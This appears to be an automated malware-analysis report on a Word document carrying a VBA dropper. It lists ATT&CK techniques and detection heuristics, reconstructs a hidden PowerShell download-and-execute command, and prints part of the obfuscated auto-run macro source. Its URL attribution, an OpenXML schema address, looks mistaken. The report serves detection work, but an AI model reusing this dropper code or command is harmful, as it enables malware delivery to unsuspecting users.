MALICIOUS (Risk Score: 222)

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1059 Command and Scripting Interpreter
- T1204.002 Malicious File
- T1566.001 Spearphishing Attachment
The sample contains VBA macros, including a Document_Open auto-execution macro that uses the Shell() function. This function is used to execute a command that downloads and runs a second-stage payload from a hardcoded URL. The reconstructed command is 'powershell -nop -w hidden -c "IEX (New-Object Net.WebClient).DownloadString('http://schemas.openxmlformats.org/drawingml/2006/main')"'. This indicates dropper or downloader functionality.
Heuristics (6)

- ClamAV: Doc.Dropper.Agent-6605274-0 [critical, CLAMAV_DETECTION]: ClamAV detected this file as malware: Doc.Dropper.Agent-6605274-0
- VBA macros detected [medium, OLE_VBA_MACROS, 3 related findings]: Document contains VBA macro code
- Shell() call in VBA [critical, OLE_VBA_SHELL]: Shell() call in VBA
- Document_Open macro [high, OLE_VBA_DOCOPEN]: Document_Open macro
- VBA p-code auto-exec with execution tokens [high, OLE_VBA_PCODE_AUTOEXEC_EXEC]: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Embedded URL [info, EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 17764 bytes |

SHA-256: 1115ba3f137a65247c78a2988c1ca151cdd529177a5dd96c22696cac96fdf756
Preview script: first 1,000 lines of the extracted script

```vb
Attribute VB_Name = "RbGMfWlL"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On Error Resume Next
HTWurY = bzHOT + JBjYVu - jsAChr / tAqdiK / (tMNPh - tJVzS + bzFYEE + svOTTN + bbbIdj + jQoWI)
rZXCk = QznbmY + RLitt - hvRiN / ibrjQ / (vQCBW - QjSjin + WEfrYl + dGHcZq + hBUZO + ZqICQ)
cJjwQd = qQDjSz + ZpJZb - hihwKP / ajwcb / (zTTXJL - ITRwkG + BABzc + KEtcln + MIJUa + jwCFR)
Szujz = Inqct + jCzji - aWJEc / jiCzW / (TLmjj - iwzld + EzzOlI + QfazFN + XfCUM + QlIik)
PisERztMcECk ("" + WORjODwPZfw + ZuZqlVKiAJzX + adsKEhCz + WsWTjwBfj + BiwiqDWF + EhZpsXziRRtu + ZtNjTRs)
dYRVSp = dinDM + BIMqOt - lbSzK / PUEkD / (FowQaC - oCoLHI + bsFUdD + lICGSK + auZzj + GJErm)
EKzQLr = kXOjH + pUjuK - raOIO / XtnSn / (hoVva - lvatW + fpqiZ + cKhdwG + CiDnzi + jBBSf)
VIOhwE = cZWpU + pcjEs - FXciI / OFTinY / (irHCT - wCiaJj + ddbHUz + QpXsZ + Ejwsz + zmqJiZ)
End Sub
Attribute VB_Name = "uMawTCKz"
Function adsKEhCz()
On Error Resume Next
GLZcC = iWZFGt - CsfkNZ - (98173 * zXUZtd * 19855 / FpImh)
sXqMwi = fDFaLz - PkCdTH - (76224 * CJWTw * 38351 / zGzPz)
XMAwV = QTSSMo - FFJNfF - (75170 * hqikJ * 30653 / zcwww)
KcNwzBzRDzO = "p" + cVlupiqDHJiJs + ktzspWVOMcJU + "ow" + OsnsPhsuKz + mXafGOCsMEzJX + "ers" + HZSfOAhs + RcPspjBHwjznj + "h" + RzKKviUvZkVsSX + fJoolmA + "e" + vCYkJTsvjw + iWLwhpHUqj + "ll " + iSishJfw + zcvKQRcwibnhw + "( " + sEztBiMSRFq + NZRHjtWjAWYprt + "n" + UzWrPpFh + KnJiFacdjIKf + "E" + QtrhYDJ + KwITwkXU + "W"
zjjaV = wNOKr - oATaWw - (45814 * wcZaw * 66259 / GdsLoa)
TjTVQa = vaUNHH - XNZwZ - (11598 * JIbnU * 83095 / VzCWNA)
QQAYvQKq = "-o" + dHjIhwG + oGGilsBViJY + "b" + viGZbRqtHziK + qznLCpMfkdrNK + "JeC" + WqVLuLACIXovh + cUpDKXrw + "t " + VPwchNG + kJIwBdq + " SY" + nNufwdBXYHK + szJZwBZaKha + "S" + zTVnaUcMKIHqRV + pzKjFRJo + "TEM"
oVEdjT = BfhBkh - sThrCj - (59020 * zPUiQz * 83011 / KjLtjH)
zIzfu = ".IO" + nqPquJERUnm + msCIXoIzD + "." + wXVZoJkL + OsOpDGQQw + "CO" + zrtSqYj + ikqFrWnfdL + "Mp" + jDXAnSThshH + BjbGzkA + "re" + kiCJwhTlnkI + oWSDGQljz + "S"
AqqLY = aCiHSs - iTlOHt - (43468 * bnrFou * 58912 / HvnCzJ)
RfZKYWw = "s" + MHKGvFVd + miWZDFXYDw + "IO" + lvRaMfqwVMuH + LYfhWbTVsFkV + "N.d" + ckEsAbWPpUtpnW + kOiQtwsVbiQ + "E" + MpqutWk + GSPwjKo + "Fla" + zRRVWrTCdrjRV + LcfCvtAT + "te" + HMBzPhhuqTzl + zbrssYklHI + "Str" + flluzwwm + SFNKBWfrJal + "e" + TCHavwW + MICvJvWwmEFUI + "aM" + iWNFQzKUUiS + YDnraatFHFNkV + "([" + hFiKQcrYlRosB + MqCjajROuisZ + "SYS"
NQFhnF = (42601 / AADfbX * 88296 / lIHow)
zVupX = OAHbNj - CalhrQ - (49072 * WhpkEP * 84164 / cYCQIl)
DiATMj = SuEPnI - AIBXd - (77404 * ESXWM * 59896 / KPWQi)
bOnohQm = "tE" + zEYIihwJPWnsvq + jOSXSjDfQzlI + "m.I" + fBnIhih + SCuQFkBT + "o" + ZEjtFiSAs + wqlLqlEnIGA + ".m" + zUXQzvP + pwzwHidOipWjW + "EmO" + EPwzjmLY + ukHCDzcwFAn + "R" + iVKtYLzWdIOMiw + EdZQQNzWMfrtiQ + "y" + sVUbVsnMjJ + sqUBKwBXNvd + "St" + ohtTFoMztU + qiLqMhHwViW + "RE" + jjOnHwsDChLtt + EiwVHZTUqh + "a" + WUDJLidWF + mXUYnwAw + "m] "
mrqfA = (5903 / POYGG * 67479 / jzXzK)
PlUbowA = "[SY" + GVLwmBfYp + JjcMdKfMHqZC + "st" + zpoYAlEzXlVTB + jqiWZZlGm + "Em" + iDwYjSjKnMrAp + LMrrKIPwYAr + ".co" + ONiBiLGB + EDnrdErptXwNZO + "Nv" + jPGaXplZvZdq + rbNNmoWRmsh + "e" + JKBoTFufruYbPR + DaAUPfUALbHNPd + "r" + MrcPulJkbwAjo + WIUiRjqidp + "T]" + rwjPOjfPXpw + QQsRfnLZE + ":" + uuwNVJw + ISmuimAJWAjJTQ + ":" + wQzBpDnNb + jRtNrYHKwi + "frO" + tnBDDEwbivzX + YEEiYTN + "Mb" + sdmpkLFCl + ENnAkJiupoUW + "Ase" + zDFUFdUbWJZQO + YtLWJwKRE + "64" + pTdcXHRzk + hfXNdqd + "st" + uSiQuIzLuo + aqoBwum + "RI" + PbGYLjzvSTniaU + MhPHGEvWzHpiM + "ng(" + rHUfrYrjcAPbUz + VSNlNWKsKfjZEq + " 'R"
nXwXGp = (58636 / UwmHr * 57250 / ZdITQz)
UwbUMo = (35302 / lifnzB * 98109 / jnwROj)
IiKnEsqFbC = "V" + EKwwWBjuobai + cCTAYLqdX + "Dba" + ncCcUltan + WjPhvtIaYOL + "g" + OviiqqanSh + hRUqjEhJwj + "Ix" + rPzUwFz
```

... (truncated)